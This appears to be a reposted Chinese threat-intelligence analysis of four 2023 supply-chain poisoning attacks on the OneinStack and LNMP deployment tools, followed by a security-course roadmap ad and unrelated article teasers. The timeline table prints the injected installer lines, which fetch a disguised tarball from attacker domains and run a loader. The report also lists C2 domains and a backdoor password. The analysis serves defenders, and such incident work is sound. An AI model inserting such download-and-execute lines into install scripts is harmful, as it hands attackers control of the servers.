一年四起供应链投毒事件的幕后黑手

前言

2017年,黑客入侵Avast服务器,在CCleaner更新中植入恶意代码,被数百万用户下载。

2017年,M.E.Doc遭黑客攻击,篡改更新植入NotPetya,影响全球公司。

2020年,黑客入侵SolarWinds服务器,植入恶意代码影响客户敏感信息,导致美国财政部、商务部等多个政府机构用户受到长期入侵和监视。

...

以上事件,均由黑客发起的供应链攻击引发。

供应链投毒攻击是指黑客利用供应链中的软件、硬件或服务等环节,通过植入恶意代码或篡改产品,从而影响最终用户的安全的一种攻击手段。当今世界依赖于数字网络连接,个人和企业都通过网络进行交流。攻击者可以通过攻击目标公司使用的第三方服务提供商,利用其服务或软硬件作为入口点进入目标网络。然后,通过供应链将风险扩大到其他企业和用户,造成巨大的影响。

概述

2023年4月,深信服安全运营中心(MSS)安服应急响应团队和深信服深瞻情报实验室发现了一起供应链投毒攻击事件,目标是PHP/JAVA部署工具OneinStack。同月,深瞻情报实验室还发现LNMP供应链投毒事件,随后在9月和10月又发现两起供应链投毒事件,分别涉及LNMP和Oneinstack。根据该团伙常用C2服务器特征,高度怀疑这四起供应链投毒事件均出自一个黑产团伙之手。

经过关联分析,深信服深瞻情报实验室发现四起事件的TTPs存在高度一致性,且溯源分析发现该团伙使用了多个以amdc6766.net结尾的域名实施恶意活动,包括供应链投毒攻击以及动态链接库远控后门。

2023上半年至今,这个黑产组织利用多种攻击手段,包括仿冒页面(AMH、宝塔、Xshell、Navicat)、供应链投毒(LNMP、OneinStack)和公开web漏洞等,有针对性地对运维人员进行攻击。运维人员从仿冒页面或官方平台下载并执行含有恶意代码的部署工具,与攻击者C2服务器建立DNS隧道连接。

该黑产组织通过定向投毒运维部署工具供应链,长期远控低价值主机作为肉鸡,择机选择高价值目标进行深度控制。随后他们会下发Rootkit和代理工具,伺机从事各类黑产活动,给用户造成实际损失。

供应链投毒事件时间线

时间

软件名

被篡改的文件目录

植入恶意代码

2023年4月

OneinStack

oneinstack/include/openssl.sh

wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg \

tar zxf /var/local/oneinstack.jpg -C /var/local/

cd /var/local/cron \

./load linux@QWE

2023年4月

LNMP

lnmp2.0/include/init.sh

wget http://lnmp01.amdc6766.net/lnmp.jpg -cO /var/local/lnmp.jpg \

tar zxf /var/local/lnmp.jpg -C /var/local/

cd /var/local/cron \

./load linux@QWE

2023年9月

LNMP

lnmp2.0/include/init.sh、lnmp.sh

../tools/lnmp.sh  linhkkngf@QWE

2023年10月

OneinStack

/src/pcre-8.45.tar.gz/pcre-8.45/configure

wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null

rm -f /var/local/osk.jpg

/var/local/cron/load linhkkngf@QWE

4月OneinStack供应链投毒事件

2023年4月,PHP/JAVA部署工具OneinStack遭受供应链投毒攻击。攻击者在官方网站下载安装包中植入恶意链接,已发现境内用户受到感染。

在OneinStack官方网站的安装程序中,/usr/local/src/oneinstack/include/openssl.sh被攻击者植入恶意代码。当用户从恶意地址下载oneinstack.jpg后,该文件会解压并执行./cron目录下load。

在load执行后,首先会判断受害主机是否为RedHat服务器。然后,它会从download.cnoneinstack.com下载一系列恶意文件,包括t.jpg,s.jpg,install,cr.jpg,libaudit.so.2等,并将他们解压至/var/local/cron目录下。最后,利用crond实现持久化建立DNS隧道通信。

4月LNMP供应链投毒事件

2023年4月和9月期间,Linux服务器部署工具LNMP遭受了供应链投毒的攻击。此次事件使用了与上文类似的攻击手法,因此怀疑是同一伙攻击者所为。

在4月LNMP供应链投毒事件中,安装过程中从lnmp01.amdc6766.net下载了lnmp.jpg,解压并执行了包括ba、cr、libxml.2.so.2.9.2等恶意文件。

9月LNMP供应链投毒事件

9月同样出现了LNMP供应链投毒事件。攻击者在lnmp2.0/include/init.sh中植入了恶意代码,并在tools目录下植入恶意二进制程序lnmp.sh。

执行lnmp.sh后,首先判断受害主机是否为RedHat服务器,然后从download.lnmp.life下载后阶段cr.jpg、s.jpg、Install、libseaudit.so.2.4.6等恶意文件,并将它们解压到了/var/local/cron目录中。最后,通过crond实现持久建立DNS隧道通信。

10月OneinStack供应链投毒事件

2023年10月6日,Oneinstack官方镜像网站的最新安装包再次被投毒。这次投毒行为是通过植入恶意代码到oneinstack/src/pcre-8.45/configure文件实施的。攻击者从download.oneinstack.club下载了osk.jpg,解压并执行了./cron目录下load。

load执行后,首先判断受害主机是否为RedHat服务器,然后从download.oneinstack.club下载后阶段t.jpg,s.jpg,install,cr.jpg,libstdc++.so.2.0.0等恶意文件,并将它们解压至/var/local/cron。最后,通过crond实现持久建立DNS隧道通信。

四起事件,指向同一个幕后真凶!

2023年10月,深信服XDR监测到某用户主机crond被替换加载了/libxm2.so.2.9.2等远控后门,同时发现sshd程序的动态链接库劫持/lib64/linux-x86-64.so.2,记录了ssh密码并设置了后门密码360bss3200189。

随后的监控发现了异常DNS定时请求,怀疑主机上可能还存在其他的守护进程。通过对主机的调查,发现这些DNS请求是由Rootkit内核线程发起的。

攻击者可以通过这些DNS请求下发控制命令。例如获取系统版本信息、执行命令、获取文件、执行socks5代理工具等。

此次攻击事件的完整攻击流程,如下图:

通过此次攻击事件的分析,发现与上半年监测到的多起供应链投毒事件存在较高的TTPs相似性,原因如下:

1.攻击套件参数和伪装手段一致

本次攻击者最初攻击套件中的install和src.jpg,install执行命令参数为linux@QWE,使用jpg后缀作为tar包的伪装,其攻击手法与OneinStack供应链投毒事件中的初始攻击套件一致。

2.使用crond服务持久化和后门动态链接库

本次攻击者下发/usr/sbin/crond+/usr/lib/libxm2.so.2.9.2动态链接库劫持,作为远控后门,建立DNS隧道连接。

OneinStack供应链事件中后续下载的crond、libaudit.so.2等恶意文件,同样是利用crond服务动态链接库劫持,建立DNS隧道连接,进行持久化。

1703843569_658e96f16446c3fa93f56.png!small?1703843570273

3.相同的域名amdc6766.net和攻击手法

内网某台主机存在后门程序/usr/lib/libxm2.so.2.9.2,其外连域名为aliyun.amdc6766.net。

在4月份的LNMP供应链投毒事件中,LNMP的安装过程中,从恶意域名lnmp01.amdc6766.net下载了lnmp.jpg文件。随后,该文件被解压并执行了ba、cr、libxml.2.so.2.9.2等恶意文件。该事件中的域名结构、恶意文件命名结构、攻击手法与上述事件高度相似。

由此可以推断“amdc6766”团伙与这次异常定时DNS请求攻击事件高度相关。四起供应链投毒事件的核心攻击手法相同:

  • 恶意文件伪装为jpg

  • 加载器的参数相似linux@QWE或linhkkngf@QWE

  • install执行参数相同linux@QWE

  • 利用crond服务实现持久化

  • 执行crond程序加载恶意动态链接库

  • 建立DNS隧道连接

不讲武德,仿冒网站后投毒

经过深信服深瞻情报实验室对可疑域名amdc6766.net的关联分析,获得以下子域名。据了解,该域名常用于供应链投毒攻击以及动态链接库远控后门,因此内部将该团伙命名为代号“amdc6766”黑产组织。

域名

攻击活动

yum.amdc6766.net

远控后门外连域名

aliyun.amdc6766.net

远控后门外连域名

long.amdc6766.net

远控后门外连域名

baidu.amdc6766.net

远控后门外连域名

microsoft.amdc6766.net

远控后门外连域名

xshell.amdc6766.net

xshell供应链投毒攻击

navicat.amdc6766.net

navicat供应链投毒攻击

navicat02.amdc6766.net

navicat供应链投毒攻击

download.amdc6766.net

xshell供应链投毒攻击

lnmp01.amdc6766.net

LNMP供应链投毒攻击

今年4月,监测发现可疑xiandazm.com域名仿冒AMH面板官网。

仿冒页面中的AMH面板部署脚本已被替换为恶意链接。该安装脚本中注入恶意代码从down.amh.jpg下载amh.jpg,提供linux@QWE执行load,后续阶段与供应链投毒攻击无异。

根据恶意文件和网空特征关联到多个仿冒运维部署工具的网站。

可疑域名

攻击活动

域名注册时间

xiandazm.com

AMH面板仿冒页面

2023-03-06 08:02:55

cqdtwxx.com

AMH面板仿冒页面

2016-12-23 07:45:26

linhunq.com

Navicat仿冒页面

2023-02-08 06:28:09

www.navicatcn.net

Navicat仿冒页面

2023-01-13 07:56:59

cnxshell.com

Xshell仿冒页面

2023-03-06 08:02:55

cnlnmp.com

LNMP仿冒页面

2023-01-09 09:32:48

bixwinner.cc

恶意Xshell下载地址

2023-03-25 08:01:25

biosoft.cc

恶意LNMP下载地址

2023-03-07 09:17:44

lightsoft.cc

恶意宝塔面板下载地址

2023-03-23 07:41:04

highthost.cc

恶意Xshell下载地址

2023-03-25 08:01:24

lukesoft.cc

恶意Navicat下载地址

2023-03-07 09:17:44

amhplus.cc

恶意AMH面板下载地址

2023-05-01 09:10:29

download.amh.tw

恶意AMH面板下载地址

/

“amdc6766”黑产组织长期以来一直利用仿冒页面、供应链投毒及公开web漏洞等攻击方式,针对运维人员常用软件Navicat、Xshell、LNMP、AMH、OneinStack、宝塔等开展定向攻击活动。经过前期潜伏发现高价值目标后,他们会采取持久化手段,例如植入动态链接库、Rootkit、恶意crond服务等,控制受感染的主机,伺机发起各类黑产攻击活动。

思考:如何防范供应链攻击

对于防范供应链攻击而言,难点在于,攻击者只需找到软件供应链的一个弱点,就能轻松入侵并造成危害。然而,防守方企业需要对整个供应链上下游进行全面的安全防护。由于供应链的复杂性,追溯和清除攻击痕迹都是十分困难的,而这对大多数企业来说既不可行又不现实。因此,企业的重点应该是进一步提升自身的安全防护能力和意识,即使上下游供应链遭到黑客入侵,也能确保自身数据的安全。

在此,我们提醒您:

  • 验证软件来源:在部署新的运维工具或更新时,确保从官方可信赖的渠道获取软件,避免使用来路不明的软件包。

  • 签名验证:对于软件包和更新,验证数字签名以确保其完整性和真实性,避免被篡改的恶意软件。

  • 安全审计:定期对运维工具和软件进行安全审计,及时发现潜在的安全隐患和恶意代码。

  • 供应商信任:与可信赖的供应商建立长期合作关系,了解其安全实践和供应链管理措施。

网络安全学习路线 (2024最新整理)

 如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言扣1或者关注我我后台会主动发给你! 

第一阶段:安全基础

网络安全行业与法规

Linux操作系统

计算机网络

HTML PHP Mysql Python基础到实战掌握

  第二阶段:信息收集

IP信息收集

域名信息收集

服务器信息收集

Web网站信息收集

Google hacking

Fofa网络安全测绘

 第三阶段:Web安全 

SQL注入漏洞

XSS

CSRF漏洞

文件上传漏洞

文件包含漏洞

SSRF漏洞

XXE漏洞

远程代码执行漏洞

密码暴力破解与防御

中间件解析漏洞

反序列化漏洞

 第四阶段:渗透工具 

MSF

Cobalt strike

Burp suite

Nessus   Appscea   AWVS

Goby   XRay

Sqlmap

Nmap

Kali

 第五阶段:实战挖洞 

漏洞挖掘技巧

Src

Cnvd

众测项目

热门CVE漏洞复现

靶场实战

学习资料的推荐

学习框架已经整理完毕,现在就差资料资源了,我这里整理了所有知识点对应的资料资源文档,大家不想一个一个去找的话,可以参考一下这些资料!

1.视频教程

 2.SRC技术文档&PDF书籍 

3.大厂面试题    

特别声明:

此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/10682.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

Qt信号和槽-->day04

Qt信号和槽 标准的信号和槽函数Qt中的槽函数Qt中的信号 connect案例 自定义信号和槽案例分析 信号槽的拓展信号连接信号案例 信号槽的两种连接方式Qt5中的处理方式Qt4中的处理方式Qt5处理信号槽重载问题案例 lambda表达式简单案例Qt中的应用 补充知识点 标准的信号和槽函数 QW…

【超级详细】基于Zynq FPGA对雷龙SD NAND的测试

目录 一、SD NAND特征1.1 SD卡简介1.2 SD卡Block图 二、SD卡样片三、Zynq测试平台搭建3.1 测试流程3.2 SOC搭建 一、SD NAND特征 1.1 SD卡简介 雷龙的SD NAND有很多型号,在测试中使用的是CSNP4GCR01-AMW与CSNP32GCR01-AOW。芯片是基于NAND FLASH和 SD控制器实现的…

linux物理内存管理:node,zone,page

一、总览 对于物理内存内存,linux对内存的组织逻辑从上到下依次是:node,zone,page,这些page是根据buddy分配算法组织的,看下面两张图: 上面的概念做下简单的介绍: Node&#xff1a…

STM32-Flash闪存

目录 一、简介 1、闪存模块组织 2、FLASh基本结构 3、FLash写入和读取操作 4、编程流程 5、选项字节格式 6、选项字节编程步骤 二、读写芯片内部FLASH编程 三、器件电子签名 1、简介 2、编程实现 一、简介 STM32F1系列的FLASH包含程序存储器、系统存储器和选项字节…

数据结构之带头双向循环链表

前言:前面我们实现了顺序表和单链表,这次来实现一个结构更复杂的链表-----带头双向循环链表。不要被它的名字吓到哦,只是结构复杂而已,它的结构更有利于代码的实现。 1 双向循环链表的介绍 有了单链表的基础,要实现这…

10个最常用的Python包,程序员必备!

世界上有超过200,000个Python程序包(这只是基于官方的Python程序包索引PyPI托管的程序包)。 这就引出了一个问题:拥有这么多的软件包,每个Python程序员都需要学习哪些软件包是最重要的? 为了帮助回答这个问题&#x…

线上问题的排查-java死锁问题如何排查

这里写目录标题 1.java死锁如何排查2.具体步骤1.1识别死锁现象1.2收集线程转储1.3分析线程转储1.4代码审查1.5重现问题1.6使用调试工具1.7.优化和验证 3. 解决方案总结 1.java死锁如何排查 在Java应用程序中,死锁是一个经典的并发问题,它会导致线程永久阻…

shodan(4-5)

以下笔记学习来自B站泷羽Sec: B站泷羽Sec 1. 查看自己的出口IP 可以知晓自己是哪个IP连接的公网 shodan myip2. 指定标题搜索 http.title:内容搜索被挂黑页的网页:获得标题中含有hacked by的IP shodan search --limit 10 --fields ip_str,port htt…

三种风格截然不同的实验室工控界面

三种风格截然不同的实验室工控界面各具特色。一种可能是简洁现代风,以简洁的线条、纯净的色彩和直观的图标,呈现出高效与专业。 另一种或许是科技未来风,运用炫酷的光影效果和立体感十足的设计,展现实验室的前沿科技感。 还有一…

Redis如何保证数据不丢失(可靠性)

本文主要以学习为主,详细参考:微信公众平台 Redis 保证数据不丢失的主要手段有两个: 持久化 多机部署 我们分别来看它们两的具体实现细节。 1.Redis 持久化 持久化是指将数据从内存中存储到持久化存储介质中(如硬盘&#xf…

STM32F405RGT6单片机原理图、PCB免费分享

大学时机创比赛时画的板子,比到一半因为疫情回家,无后续,,,已打板验证过,使用stm32f405rgt6做主控 下载文件资源如下 原理图文件 pcb文件 外壳模型文件 stm32f405例程 功能 以下功能全部验证通过 4路…

“穿梭于容器之间:C++ STL迭代器的艺术之旅”

引言: 迭代器(Iterator)是C STL(标准模板库)中非常重要的一部分,它提供了一种统一的方式来遍历容器中的元素。无论容器是数组、链表、树还是其他数据结构,迭代器都能够以一致的方式访问这些数据…

jmeter常用配置元件介绍总结之用linux服务器压测

系列文章目录 安装jmeter jmeter常用配置元件介绍总结之用linux服务器压测 1.编写测试脚本2.执行测试脚本 1.编写测试脚本 在linux服务器上进行压测,由于是没有界面的,因此我们可以先在界面上把压测脚本写好: 如图:我这里简单的写…

Ubuntu 的 ROS 操作系统安装与测试

引言 机器人操作系统(ROS, Robot Operating System)是一个用于开发机器人应用的开源框架,它提供了一系列功能丰富的库和工具,能够帮助开发者构建和控制机器人。 当前,ROS1的最新版本为Noetic Ninjemys,专为…

计算机组成原理——编码与纠错(汉明编码)

校验码放在2^x次方的位置——即1,2,4——将检测位按序排列p3p2p1 汉明编码从左到右数某个位置位1(位数),就表示第几组 奇偶校验 例题 纠错过程 汉明编码的最小距离是3

fabric操作canvas绘图(1)共32节

对于前端而言,离不开canvas就像鱼离不开水,前端canvas神器fabric你值得拥有!接下来我们就来一步步揭开她的面纱。 一、fabric的理解 用原生的canvas来实现,代码量会比较大,而且还要处理很多细节,而Fabric…

C++ 内存分布及 new , delete 分配问题( ~~~ 面试重要 ~~~)

文章目录 前言一、内存分布二、new 、delete 分配问题总结 前言 本篇文章笔者将会对 C 中的内存问题简单的讲解 , 同时对 new , delete 的面试题进行重点讲解. 一、内存分布 ● C语言和C 分布情况是一样的, 如下 : ● 栈 ○ 栈 的管理是由编译器自动管理 , 不需要我们人为做…

数据结构-哈夫曼树

一.什么是哈夫曼树 不同搜索树的效率是不一样的,根据不同的频率构造效率比较好或者最好的搜索树就是哈夫曼树 二.哈夫曼树的定义 将带权路径的长度降低最低 每个叶子节点到根节点的距离乘权值,再全都加起来就得到了WPL值 第一颗二叉树:从上到下计算 5x14x23x32x41…

双11精选网络安全书单:打造数字世界的钢铁长城!

🤟 基于入门网络安全/黑客打造的:👉黑客&网络安全入门&进阶学习资源包 🌟双11火热来袭,网络安全书单推荐🚀 随着数字化浪潮的汹涌澎湃,网络安全已经成为了每个从业者不可回避的重要议…

WebGUI之Gradio:Gradio 5的简介、安装和使用方法、案例应用之详细攻略

WebGUI之Gradio:Gradio 5的简介、安装和使用方法、案例应用之详细攻略 目录 Gradio 5的简介 1、Gradio的适用场景 2、Gradio 5 的主要改进包括: Gradio 5的安装和使用方法 1、安装和使用方法 2、使用方法 2.1、文本内容 (1)、简单的输入/输出组件…